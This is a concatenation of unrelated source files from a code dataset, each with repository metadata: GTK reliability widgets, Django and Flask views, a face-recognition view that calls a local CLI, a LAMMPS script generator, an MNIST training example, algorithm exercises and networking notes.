"</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_count_labels, _fixed, 5, 25) _x_pos = max(x_pos, _x_pos) + 25 # Create the tooltips for all the results display widgets. self.txtLambdaB.set_tooltip_text(_(u"Displays the generic hazard rate " u"for the selected capacitor.")) # Place the reliability result display widgets. 
if self.txtLambdaB.get_parent() is not None: self.txtLambdaB.reparent(_fixed) if self.txtPiQ.get_parent() is not None: self.txtPiQ.reparent(_fixed) _fixed.put(self.txtLambdaB, _x_pos, _y_pos[1]) _fixed.put(self.txtPiQ, _x_pos, _y_pos[2]) _fixed.show_all() return _x_pos def create_217_stress_results(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 part stress result widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: _x_pos: the x-coordinate of the widgets. :rtype: int """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Part Stress Results") + "</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_stress_labels, _fixed, 5, 25) _x_pos = max(x_pos, _x_pos) + 25 # Create the tooltips for all the results display widgets. self.txtLambdaB.set_tooltip_text(_(u"Displays the base hazard rate " u"for the selected capacitor.")) # Place the reliability result display widgets. if self.txtLambdaB.get_parent() is not None: self.txtLambdaB.reparent(_fixed) if self.txtPiQ.get_parent() is not None: self.txtPiQ.reparent(_fixed) _fixed.put(self.txtLambdaB, _x_pos, _y_pos[1]) _fixed.put(self.txtPiQ, _x_pos, _y_pos[2]) _fixed.put(self.txtPiE, _x_pos, _y_pos[3]) # Subcategory specific widgets. 
if self._subcategory == 51: _fixed.put(self.txtPiSR, _x_pos, _y_pos[5]) elif self._subcategory == 52: _fixed.put(self.txtPiC, _x_pos, _y_pos[5]) elif self._subcategory not in [55, 56, 57, 58]: # Not variable _fixed.put(self.txtPiCV, _x_pos, _y_pos[4]) if self._subcategory == 58: _fixed.put(self.txtPiCF, _x_pos, _y_pos[4]) _fixed.show_all() return _x_pos def load_217_count_results(self, model): """ Method to load the Capacitor class MIL-HDBK-217 parts count result gtk.Widgets(). :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ fmt = '{0:0.' + str(Configuration.PLACES) + 'G}' self.txtLambdaB.set_text(str(fmt.format(model.base_hr))) self.txtPiQ.set_text(str(fmt.format(model.piQ))) return False def load_217_stress_results(self, model): """ Method to load the Capacitor class MIL-HDBK-217 part stress result gtk.Widgets(). :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ fmt = '{0:0.' + str(Configuration.PLACES) + 'G}' self.txtLambdaB.set_text(str(fmt.format(model.base_hr))) self.txtPiQ.set_text(str(fmt.format(model.piQ))) self.txtPiE.set_text(str(fmt.format(model.piE))) self.txtPiCV.set_text(str(fmt.format(model.piCV))) if self._subcategory == 51: self.txtPiSR.set_text(str(fmt.format(model.piSR))) elif self._subcategory == 52: self.txtPiC.set_text(str(fmt.format(model.piC))) elif self._subcategory == 58: self.txtPiCF.set_text(str(fmt.format(model.piCF))) return False def load_derate_plot(self, model, frame): """ Method to load the stress derate plot for the Capacitor class. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the plot for. :param gtk.Frame frame: the gtk.Frame() to embed the derate plot into. 
:return: False if successful or True if an error is encountered. :rtype: bool """ # Clear the operating point and derating curve for the component. We # do this here so the component-specific GUI will set the proper x and # y-axis labels. self.axsDerate.cla() # Plot the derating curve and operating point. _x = [float(model.min_rated_temperature), float(model.knee_temperature), float(model.max_rated_temperature)] self.axsDerate.plot(_x, model.lst_derate_criteria[0], 'r.-', linewidth=2) self.axsDerate.plot(_x, model.lst_derate_criteria[1], 'b.-', linewidth=2) self.axsDerate.plot(model.temperature_active, model.voltage_ratio, 'go') if(_x[0] != _x[2] and model.lst_derate_criteria[1][0] != model.lst_derate_criteria[1][2]): self.axsDerate.axis([0.95 * _x[0], 1.05 * _x[2], model.lst_derate_criteria[1][2], 1.05 * model.lst_derate_criteria[1][0]]) else: self.axsDerate.axis([0.95, 1.05, 0.0, 1.05]) self.axsDerate.set_title(_(u"Voltage Derating Curve for %s at %s") % (model.part_number, model.ref_des), fontdict={'fontsize': 12, 'fontweight': 'bold', 'verticalalignment': 'baseline'}) _legend = tuple([_(u"Harsh Environment"), _(u"Mild Environment"), _(u"Voltage Operating Point")]) _leg = self.axsDerate.legend(_legend, loc='upper right', shadow=True) for _text in _leg.get_texts(): _text.set_fontsize('small') # Set the proper labels on the derating curve. self.axsDerate.set_xlabel(_(u"Temperature (\u2070C)"), fontdict={'fontsize': 12, 'fontweight': 'bold'}) self.axsDerate.set_ylabel(r'$\mathbf{V_{op} / V_{rated}}$', fontdict={'fontsize': 12, 'fontweight': 'bold', 'rotation': 'vertical', 'verticalalignment': 'baseline'}) self.figDerate.tight_layout() frame.add(self.pltDerate) frame.show_all() return False
c3016ff7a972f62e2906adc7b0164ee77a5a2a1c
ebfac951b49ba380d4b88e0c6308aea326597381
/chatrender/views/chat_types.py
7b37509617634b9ce6f0f47cc6e770b11a026be2
[ "MIT" ]
permissive
The-Politico/django-politico-slackchat-renderer
2e4175359a4df004526722a190040cef767837fd
adb3ed2ba5039a97ee7b021d39aa40cab11e5661
refs/heads/master
2022-12-10T10:57:51.796473
2018-05-22T15:37:57
2018-05-22T15:37:57
120,328,521
2
0
MIT
2022-12-08T02:09:33
2018-02-05T16:10:25
JavaScript
UTF-8
Python
false
false
431
py
import requests

from chatrender.conf import settings
from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render


@staff_member_required
def chat_types(request):
    """Render the list of chat types pulled from the slackchat API.

    Staff-only view: performs a GET against the configured chat-type
    endpoint and hands the decoded JSON payload to the list template.
    """
    payload = requests.get(settings.SLACKCHAT_CHATTYPE_ENDPOINT).json()
    return render(
        request,
        'chatrender/chattype_list.html',
        context={"chat_types": payload},
    )
9d48aa9c700b4a07e4a8f8bcbda6c8fb2120b598
bad08ce4b707f8d479a6f9d6562f90d397042df7
/Python/python-socket-网络协议.py
eb95bcb6957946195c1044ca5c82f8d396114488
[]
no_license
lengyue1024/notes
93bf4ec614cbde69341bc7e4decad169a608ff39
549358063da05057654811a352ae408e48498f25
refs/heads/master
2020-04-29T07:14:45.482919
2019-03-16T07:51:26
2019-03-16T07:51:26
175,945,339
2
0
null
2019-03-16T08:19:53
2019-03-16T08:19:52
null
GB18030
Python
false
false
2,273
py
---------------------------- 网络协议入门 | ---------------------------- ---------------------------- 网络-物理层和链路层 | ---------------------------- * 以太网协议(ethernet) * 一组电信号组成一个数据包,叫做 - 帧 * 每一帧分为:报头(head)和数据(data)两部分 ——————————————————————————————— |head| data | ——————————————————————————————— * head(固定18个字节) * 发送者/源地址 :6个字节 * 接收者/目标地址 :6个字节 * 数据类型 :6个字节 * data(最短64字节,最长1500字节) * 数据包的具体内容 * head + data 最大长度就是 1518字节 (1500 +18),超过长度,就分片发送 * mac地址 * head 中包含的源地址和目标地址的由来. * ethernet 规定,接入internet的设备,都必须要具备网卡,发送端和接收端的地址,就是指网卡地址,也就是mac地址 * 每块网卡出厂时,都被烧录了世界上唯一的mac地址,长度为 48 位 2进制,通常由 12 位 16进制 表示 00:16:3e:16:0b:5e * 前面6位是厂商编号 * 后面6位是流水号 * 广播 * 有了mac地址,同一个网络内的两台主机就可以通信了(一台主机通过arp协议获取另一台主机的mac地址) * ethernet 采用最原始的方式 - 广播,方式进行通信,通俗点.计算机通信基本靠吼 IEEE802.1Q ——————————————————————————————————————————————————————————————————————————— |目标mac地址 |发送源mac地址 |TDIP |TCI |类型 |数据部分 |CRC | ——————————————————————————————————————————————————————————————————————————— 目标mac地址 :6字节 发送源mac地址 :6字节 TDIP :0x8100 TCI :内含12个bit的vlan标识 类型 :2字节 数据部分 :46 - 1500 字节 CRC :4字节,经过重新计算
1f459741a34f6b06e0c9856c6a59f86fee6acd63
a3cdfaf2d4d72f4d1c8bd2a9d3e8ce1f6d0316ca
/Research Files/10x10x10_moving/10x10x10movinglammpsscriptgenerator.py
e24983c5d7ba1cc8fa3588b9ef5309dd69d9177a
[]
no_license
webclinic017/Personal-Projects
d61e3f5ad1e1c12c611ae088fa64050dc2f4693b
4e730e350e5698bb40bbdb1526596c6a8a3c5596
refs/heads/master
2023-06-10T23:00:50.948934
2021-07-03T00:46:19
2021-07-03T00:46:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,014
py
#!/usr/bin/env python
"""Generate twenty LAMMPS spin-dynamics input scripts for a 10x10x10 bcc
iron box, one per temperature from 50 K to 1000 K in 50 K steps.

Fix over the original: each output file is opened with a ``with`` block so
the handle is closed even if a write raises; the redundant ``int()`` casts
are dropped (``temperature`` and ``temp`` are already ints).  The script
text written to each file is unchanged.
"""

if __name__ == '__main__':
    temperature = 50  # temperature step in K
    for i in range(1, 21):
        temp = temperature * i
        # Historical naming quirk: the 1000 K file is labelled "99_1000".
        # Kept as-is so existing downstream tooling keeps finding the file.
        if temp == 1000:
            temp_string = "99_1000"
        else:
            temp_string = str(temp)
        # "w+" kept from the original even though the file is never read back.
        with open("10x10x10_{}k_moving_py.lmp".format(temp_string), "w+") as f:
            f.write("# bcc iron in a 3d periodic box\n\n")
            f.write("clear\n")
            f.write("units metal\n")
            f.write("atom_style spin\n\n")
            f.write("dimension 3\n")
            f.write("boundary p p p\n\n")
            f.write("# necessary for the serial algorithm (sametag)\n")
            f.write("atom_modify map array \n\n")
            f.write("lattice bcc 2.8665\n")
            f.write("region box block 0.0 10.0 0.0 10.0 0.0 10.0\n")
            f.write("create_box 1 box\n")
            f.write("create_atoms 1 box\n\n")
            f.write("# setting mass, mag. moments, and interactions for bcc iron\n\n")
            f.write("mass 1 55.845\n\n")
            f.write("# set group all spin/random 31 2.2\n")
            f.write("set group all spin 2.2 0.0 0.0 1.0\n")
            f.write("pair_style hybrid/overlay eam/alloy spin/exchange 3.5\n")
            f.write("pair_coeff * * eam/alloy Fe_Mishin2006.eam.alloy Fe\n")
            f.write("pair_coeff * * spin/exchange exchange 3.4 0.02726 0.2171 1.841\n\n")
            f.write("neighbor 0.1 bin\n")
            f.write("neigh_modify every 10 check yes delay 20\n\n")
            f.write("fix 1 all precession/spin zeeman 0.0 0.0 0.0 1.0\n")
            f.write("fix_modify 1 energy yes\n")
            # Langevin thermostat target is the per-file temperature.
            f.write("fix 2 all langevin/spin {}.0 0.01 21\n\n".format(temp))
            f.write("fix 3 all nve/spin lattice moving\n")
            f.write("timestep 0.0001\n\n")
            f.write("# compute and output options\n\n")
            f.write("compute out_mag all spin\n")
            f.write("compute out_pe all pe\n")
            f.write("compute out_ke all ke\n")
            f.write("compute out_temp all temp\n\n")
            f.write("variable magz equal c_out_mag[3]\n")
            f.write("variable magnorm equal c_out_mag[4]\n")
            f.write("variable emag equal c_out_mag[5]\n")
            f.write("variable tmag equal c_out_mag[6]\n\n")
            f.write("thermo_style custom step time v_magnorm v_tmag temp v_emag ke pe press etotal\n")
            f.write("thermo 5000\n\n")
            f.write("compute outsp all property/atom spx spy spz sp fmx fmy fmz\n")
            f.write("dump 1 all custom 100 dump_iron.lammpstrj type x y z c_outsp[1] c_outsp[2] c_outsp[3]\n\n")
            f.write("run 100000\n")
            f.write("# run 2\n\n")
            f.write("unfix 3\n")
            f.write("fix 3 all nve/spin lattice moving\n")
            # Lattice velocities are (re)initialized at the same temperature.
            f.write("velocity all create {} 4928459 rot yes dist gaussian\n\n".format(temp))
            f.write("run 100000")
6f97e11be404d475c96c2f5c4625ac4c0a5f12cb
bfe6c95fa8a2aae3c3998bd59555583fed72900a
/lengthOfLIS.py
0416711c4a259c5b75a686e99c23b0c224139c4f
[]
no_license
zzz136454872/leetcode
f9534016388a1ba010599f4771c08a55748694b2
b5ea6c21bff317884bdb3d7e873aa159b8c30215
refs/heads/master
2023-09-01T17:26:57.624117
2023-08-29T03:18:56
2023-08-29T03:18:56
240,464,565
0
0
null
null
null
null
UTF-8
Python
false
false
991
py
class Solution:

    def lengthOfLIS(self, nums):
        """Return the length of the longest strictly increasing subsequence.

        Patience-sorting approach: ``tails[k]`` holds the smallest possible
        tail value of an increasing subsequence of length ``k + 1``.  Each
        number either extends the longest run or tightens one of the tails,
        so the answer is just ``len(tails)``.  O(n log n) time, O(n) space.
        """
        tails = []
        for value in nums:
            # Binary search for the leftmost tail >= value.
            lo, hi = 0, len(tails)
            while lo < hi:
                mid = (lo + hi) // 2
                if tails[mid] < value:
                    lo = mid + 1
                else:
                    hi = mid
            if lo == len(tails):
                tails.append(value)   # value extends the longest subsequence
            else:
                tails[lo] = value     # value tightens an existing tail
        return len(tails)


sl = Solution()
nums = [10, 9, 2, 5, 3, 7, 101, 18]
print(sl.lengthOfLIS(nums))
82d5072c95d430143fba75124b748cf8add70456
d342898f0a632b28d5c6f594208300c546cb51e3
/Helper.py
ee73a7910b6b3f420a71ca6c2bdb1f2d9ec9298c
[]
no_license
DragonKiller952/ST-Groep-8
91ce869b1905504e65d84acf104fc68156d0ef91
00c19288b2fb5a6110fba6a2eea7b03650d0e534
refs/heads/main
2023-01-31T22:08:12.134684
2020-12-17T09:05:02
2020-12-17T09:05:02
318,191,516
0
0
null
null
null
null
UTF-8
Python
false
false
612
py
# Strategy helpers: each takes the calling agent plus the available
# choices and the list of values already claimed by other agents.


def standard_color(*args):
    """Always pick blue, regardless of agent or prior picks."""
    return 'blue'


def unique_random(self, choices, used):
    """Draw random candidates until one not yet in *used* appears; claim it."""
    pick = self.random.choice(choices)
    while pick in used:
        pick = self.random.choice(choices)
    used.append(pick)
    return pick


def id_color(self, choices, used):
    """Deterministically map the agent's id onto the choice list."""
    return choices[self.agentId]


def id_coord(self, choices, used):
    """Fixed spawn coordinate per agent id (*choices* is ignored)."""
    spawn_points = [
        (12, 75), (30, 60), (40, 80), (40, 90), (60, 80),
        (50, 35), (60, 35), (65, 15), (75, 40), (90, 45),
    ]
    return spawn_points[self.agentId]
09fb11f511d0b05365e34eecb467462c7c0d96a0
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/97/usersdata/228/56191/submittedfiles/lecker.py
8478e84811202758aba6f53520c3def648a83ece
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
838
py
# -*- coding: utf-8 -*-
from __future__ import division

# Read two integer lists of length n from stdin (interactive exercise).
n = int(input('digite o número de elementos:'))
lista1 = []
lista2 = []
for i in range(0, n, 1):
    termo1 = int(input('digite o termo:'))
    lista1.append(termo1)
for i in range(0, n, 1):
    termo2 = int(input('digite o termo:'))
    lista2.append(termo2)


def leker(a):
    """Return True when exactly one of the checked conditions holds in *a*.

    Fixes over the original submission, which never used its parameter:
      * referenced an undefined global ``lista`` (NameError on every call);
      * indexed ``lista[n]`` (one past the last element, IndexError);
      * used the element value ``lista[1]`` as the loop's start index.
    The branch structure is preserved; indices are now bounds-safe.
    NOTE(review): the intended "lecker" property of the exercise is not
    visible from this file — confirm the counting rule against the
    assignment statement before relying on this predicate.
    """
    cont = 0
    if a[0] > a[1]:
        cont = cont + 1
    elif a[len(a) - 1] > a[len(a) - 2]:
        cont = cont + 1
    else:
        # Count interior elements that sit inside a strictly rising triple.
        for i in range(1, len(a) - 1, 1):
            if a[i - 1] < a[i] < a[i + 1]:
                cont = cont + 1
    return cont == 1


# leker() returns a bool, so a plain if/else covers both outcomes
# (the original's `elif leker(...) == False` re-ran the whole check).
if leker(lista1):
    print('S')
else:
    print('N')
if leker(lista2):
    print('S')
else:
    print('N')
440db3f7231af9543565979f36d3760abc278062
5f1afd8240ce286b0a78f61b7faa3a53e4d170e1
/examples/contrib/mnist/mnist_with_neptune_logger.py
2f7c7d2bc0784994e1fff9e02cd16acff0e25d91
[ "BSD-3-Clause" ]
permissive
dnola/ignite
b71e5fe7c57fe157c09044d534321b070ec4c844
da86f6d83268cba0275a18be506a69f142157e97
refs/heads/master
2020-12-29T08:47:24.519519
2020-02-07T14:30:29
2020-02-07T14:30:29
238,542,050
0
0
BSD-3-Clause
2020-02-05T20:29:07
2020-02-05T20:29:06
null
UTF-8
Python
false
false
6,778
py
""" MNIST example with training and validation monitoring using Neptune. Requirements: Neptune: `pip install neptune-client` Usage: Run the example: ```bash python mnist_with_neptune_logger.py ``` Go to https://neptune.ai and explore your experiment. Note: You can see an example experiment here: https://ui.neptune.ai/o/neptune-ai/org/pytorch-ignite-integration/e/PYTOR-26/charts """ import sys from argparse import ArgumentParser import logging import torch from torch.utils.data import DataLoader from torch import nn import torch.nn.functional as F from torch.optim import SGD from torchvision.datasets import MNIST from torchvision.transforms import Compose, ToTensor, Normalize from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator from ignite.metrics import Accuracy, Loss from ignite.contrib.handlers.neptune_logger import * LOG_INTERVAL = 10 class Net(nn.Module): def __init__(self): super(Net, self).__init__() self.conv1 = nn.Conv2d(1, 10, kernel_size=5) self.conv2 = nn.Conv2d(10, 20, kernel_size=5) self.conv2_drop = nn.Dropout2d() self.fc1 = nn.Linear(320, 50) self.fc2 = nn.Linear(50, 10) def forward(self, x): x = F.relu(F.max_pool2d(self.conv1(x), 2)) x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2)) x = x.view(-1, 320) x = F.relu(self.fc1(x)) x = F.dropout(x, training=self.training) x = self.fc2(x) return F.log_softmax(x, dim=-1) def get_data_loaders(train_batch_size, val_batch_size): data_transform = Compose([ToTensor(), Normalize((0.1307,), (0.3081,))]) train_loader = DataLoader(MNIST(download=True, root=".", transform=data_transform, train=True), batch_size=train_batch_size, shuffle=True) val_loader = DataLoader(MNIST(download=False, root=".", transform=data_transform, train=False), batch_size=val_batch_size, shuffle=False) return train_loader, val_loader def run(train_batch_size, val_batch_size, epochs, lr, momentum, neptune_project): train_loader, val_loader = get_data_loaders(train_batch_size, val_batch_size) model 
= Net() device = 'cpu' if torch.cuda.is_available(): device = 'cuda' optimizer = SGD(model.parameters(), lr=lr, momentum=momentum) criterion = nn.CrossEntropyLoss() trainer = create_supervised_trainer(model, optimizer, criterion, device=device) if sys.version_info > (3,): from ignite.contrib.metrics.gpu_info import GpuInfo try: GpuInfo().attach(trainer) except RuntimeError: print("INFO: By default, in this example it is possible to log GPU information (used memory, utilization). " "As there is no pynvml python package installed, GPU information won't be logged. Otherwise, please " "install it : `pip install pynvml`") metrics = { 'accuracy': Accuracy(), 'loss': Loss(criterion) } train_evaluator = create_supervised_evaluator(model, metrics=metrics, device=device) validation_evaluator = create_supervised_evaluator(model, metrics=metrics, device=device) @trainer.on(Events.EPOCH_COMPLETED) def compute_metrics(engine): train_evaluator.run(train_loader) validation_evaluator.run(val_loader) npt_logger = NeptuneLogger(api_token=None, project_name=neptune_project, name='ignite-mnist-example', params={'train_batch_size': train_batch_size, 'val_batch_size': val_batch_size, 'epochs': epochs, 'lr': lr, 'momentum': momentum}) npt_logger.attach(trainer, log_handler=OutputHandler(tag="training", output_transform=lambda loss: {'batchloss': loss}, metric_names='all'), event_name=Events.ITERATION_COMPLETED(every=100)) npt_logger.attach(train_evaluator, log_handler=OutputHandler(tag="training", metric_names=["loss", "accuracy"], another_engine=trainer), event_name=Events.EPOCH_COMPLETED) npt_logger.attach(validation_evaluator, log_handler=OutputHandler(tag="validation", metric_names=["loss", "accuracy"], another_engine=trainer), event_name=Events.EPOCH_COMPLETED) npt_logger.attach(trainer, log_handler=OptimizerParamsHandler(optimizer), event_name=Events.ITERATION_COMPLETED(every=100)) npt_logger.attach(trainer, log_handler=WeightsScalarHandler(model), 
event_name=Events.ITERATION_COMPLETED(every=100)) npt_logger.attach(trainer, log_handler=GradsScalarHandler(model), event_name=Events.ITERATION_COMPLETED(every=100)) # kick everything off trainer.run(train_loader, max_epochs=epochs) npt_logger.close() if __name__ == "__main__": parser = ArgumentParser() parser.add_argument('--batch_size', type=int, default=64, help='input batch size for training (default: 64)') parser.add_argument('--val_batch_size', type=int, default=1000, help='input batch size for validation (default: 1000)') parser.add_argument('--epochs', type=int, default=10, help='number of epochs to train (default: 10)') parser.add_argument('--lr', type=float, default=0.01, help='learning rate (default: 0.01)') parser.add_argument('--momentum', type=float, default=0.5, help='SGD momentum (default: 0.5)') parser.add_argument("--neptune_project", type=str, help="your project in neptune.ai") args = parser.parse_args() # Setup engine logger logger = logging.getLogger("ignite.engine.engine.Engine") handler = logging.StreamHandler() formatter = logging.Formatter("%(asctime)s %(name)-12s %(levelname)-8s %(message)s") handler.setFormatter(formatter) logger.addHandler(handler) logger.setLevel(logging.INFO) run(args.batch_size, args.val_batch_size, args.epochs, args.lr, args.momentum, args.neptune_project)
605f934856fa73abaca59a8d4b985a30749fa454
f47ac8d59fe1c0f807d699fe5b5991ed3662bfdb
/binary24.py
9cad221c86da71526bc3fda5faefd88b49ae47c7
[]
no_license
YanglanWang/jianzhi_offer
5561d8a29881d8504b23446353e9f969c01ed0c5
1c568f399ed6ac1017671c40c765e609c1b6d178
refs/heads/master
2020-06-16T10:41:44.979558
2019-08-03T09:07:37
2019-08-03T09:07:37
195,543,754
0
0
null
null
null
null
UTF-8
Python
false
false
1,224
py
import create_tree


class TreeNode:
    """Plain binary-tree node."""

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


class Solution:

    def FindPath(self, root, expectNumber):
        """Return every root-to-leaf path whose values sum to *expectNumber*.

        Each path is a list of node values ordered from the root down.

        Fix: the original left ``a``/``b`` unassigned when a node had only
        one child, raising UnboundLocalError on ``return a + b``.  Both are
        now initialized to the empty list, and an empty/absent root yields
        no paths instead of an AttributeError.
        """
        if root is None:
            return []
        # Leaf: the path is valid only if this value closes out the target.
        if root.left is None and root.right is None:
            if root.val == expectNumber:
                return [[root.val]]
            else:
                return []
        a = []
        b = []
        if root.left is not None:
            a = self.FindPath(root.left, expectNumber - root.val)
        if root.right is not None:
            b = self.FindPath(root.right, expectNumber - root.val)
        # Prepend the current value to every path found below this node.
        for i in a + b:
            i.insert(0, root.val)
        return a + b


a = Solution()
root = create_tree.fromList([10, 5, 12, 4, 7])
b = a.FindPath(root, 22)
print(b)
4ad984ec5a966cb62eaeb618dfbc4aafb9fcd4f7
7100c3c8012dcf2bc6427bf33c55662bc61924f2
/api/v1/views/cities.py
ecabd72acf87d8cdd29c4b5dfb6bb78c183ae1ca
[ "LicenseRef-scancode-public-domain" ]
permissive
OscarDRT/AirBnB_clone_v3
c3ffa7b7ffb5182143b0f37c8ef7d1342cdffa0a
9f015b7f1aa1b9c7f7f0d85fd7f5dc97a6679e9c
refs/heads/master
2022-05-27T07:35:53.627606
2020-04-29T21:55:33
2020-04-29T21:55:33
259,408,927
0
0
null
null
null
null
UTF-8
Python
false
false
1,956
py
#!/usr/bin/python3
"""City REST endpoints: list/create under a state, and fetch/update/delete
a single city."""
from flask import Flask, jsonify, abort, make_response, request
from api.v1.views import app_views
from models.state import *
from models.city import *
from models import storage


@app_views.route('/states/<state_id>/cities', methods=['GET', 'POST'],
                 strict_slashes=False)
def cities_li(state_id):
    """List the cities of a state (GET) or create one in it (POST)."""
    state = storage.get(State, state_id)
    if state is None:
        abort(404)
    if request.method == 'GET':
        # Filter the full city collection down to this state's cities.
        return jsonify([
            obj.to_dict() for obj in storage.all('City').values()
            if obj.state_id == str(state_id)
        ])
    if request.method == 'POST':
        body = request.get_json()
        if body is None:
            return (jsonify({"error": "Not a JSON"}), 400)
        if 'name' not in body:
            return (jsonify({"error": "Missing name"}), 400)
        body['state_id'] = state_id
        new_city = City(**body)
        new_city.save()
        # Re-read from storage so the response reflects the persisted row.
        saved = storage.get(City, new_city.id).to_dict()
        return make_response(jsonify(saved), 201)


@app_views.route('/cities/<city_id>', methods=['GET', 'DELETE', 'PUT'],
                 strict_slashes=False)
def my_city(city_id):
    """Fetch (GET), remove (DELETE), or update (PUT) one city by id."""
    city = storage.get(City, city_id)
    if city is None:
        abort(404)
    if request.method == 'GET':
        return jsonify(city.to_dict())
    if request.method == 'DELETE':
        storage.delete(city)
        storage.save()
        return jsonify({}), 200
    if request.method == 'PUT':
        body = request.get_json()
        if body is None:
            return (jsonify({"error": "Not a JSON"}), 400)
        # id and timestamps are server-managed; never overwritten by clients.
        protected = ('id', 'created_at', 'updated_at')
        for field, new_value in body.items():
            if field not in protected:
                setattr(city, field, new_value)
        city.save()
        return jsonify(city.to_dict()), 200
707533be29f322011c761603977cdb06d18f4ac2
972aca82afd04ec6cbb4bf7225e3dcd56fe6f3f0
/face_recog/recognition/views.py
044b04aa9c2b8708a1c1e95018615f2a28c6cf5a
[]
no_license
sbhusal123/On-web-face-recognition
a41b05e53e691648f5c0296f6ad919e353e07221
5ff56aacce759656af407ac2cba03f72b2ce3de4
refs/heads/master
2022-02-25T16:12:58.746395
2019-09-07T06:06:37
2019-09-07T06:06:37
166,095,690
0
0
null
null
null
null
UTF-8
Python
false
false
1,841
py
from django.shortcuts import render, HttpResponse
from django.core.files.storage import FileSystemStorage
import os
import shutil
import subprocess
from django.conf import settings
from .models import User

# Create your views here.


def index(request):
    """Handle upload of the test image, replacing any previous one."""
    if request.method == 'POST' and request.FILES['myfile']:
        try:
            os.remove(os.path.join(settings.BASE_DIR,
                                   'media/test_file/test_image.jpg'))
        except OSError:
            # No previous test image on disk; nothing to remove.
            pass
        myfile = request.FILES['myfile']
        myfile.name = "test_image.jpg"
        fs = FileSystemStorage(location="media/test_file")
        filename = fs.save(myfile.name, myfile)
        uploaded_file_url = "/media/test_file/test_image.jpg"
        print(uploaded_file_url)
        return render(request, 'index.html',
                      {'uploaded_file_url': uploaded_file_url})
    return render(request, 'index.html')


def registerUser(request):
    """Register a user, storing the uploaded picture as <username>.jpeg."""
    if request.method == 'POST' and request.FILES['profile_image']:
        username = request.POST["username"]
        myfile = request.FILES['profile_image']
        myfile.name = username + ".jpeg"
        User.objects.create(username=username, profile_pic=myfile)
        return render(request, 'index.html')
    return render(request, 'index.html')


def Scan(request):
    """Run the face_recognition CLI and list the names it recognized."""
    if request.method == "POST":
        name_list = []
        # BUG FIX: os.path.join() discards BASE_DIR when the second
        # argument starts with '/'; the original compensated by
        # prefixing '.' in a shell string, producing cwd-relative
        # paths.  Join the relative media sub-paths to get the real
        # directories instead.
        unknown_pictures = os.path.join(settings.BASE_DIR,
                                        'media/test_file')
        known_pictures = os.path.join(settings.BASE_DIR,
                                      'media/profile_image')
        # Argument list with shell=False so file/user-derived names
        # cannot be interpreted by a shell (command-injection fix for
        # the previous os.popen(string) call).
        result = subprocess.run(
            ["face_recognition", known_pictures, unknown_pictures],
            capture_output=True, text=True)
        for line in result.stdout.split("\n"):
            # CLI output format: "<image_path>,<name>"; skip blank or
            # malformed lines instead of raising IndexError.
            parts = line.split(",")
            if len(parts) > 1:
                name_list.append(parts[1])
        return render(request, 'index.html', {'found': name_list})
    return render(request, 'index.html')
[ "=" ]
=
15632584457de864ad6c921b7228c6996d3390a5
ebdeaa70f6e30abab03a1589bcdd56d1339151ef
/day18Python多线程/day18-多线程/code1/耗时操作.py
4fe94df37f17e3955e313560c7b922708e178a96
[]
no_license
gilgameshzzz/learn
490d8eb408d064473fdbfa3f1f854c2f163a7ef6
d476af77a6163ef4f273087582cbecd7f2ec15e6
refs/heads/master
2020-03-31T11:32:42.909453
2018-11-22T03:34:45
2018-11-22T03:34:45
152,181,143
0
0
null
null
null
null
UTF-8
Python
false
false
795
py
"""__author__ = 余婷""" import pygame from random import randint import time """ 1.耗时操作放到主线程中的问题: 耗时操作放到主线程中,会阻塞线程 多个耗时操作都放到一个线程中执行,最终执行的时间是两个耗时操作的时间和 2.怎么解决问题? 使用多线程(创建多个线程) """ def rand_color(): return randint(0, 255),randint(0, 255),randint(0, 255) def long_time(): print('耗时操作开始') time.sleep(10) print('耗时操作结束') def download(file): print('开始下载',file) time.sleep(10) print(file, '下载结束') if __name__ == '__main__': print('====') print(time.time()) download('狄仁杰') download('爱情公寓') print(time.time()) print('!!!')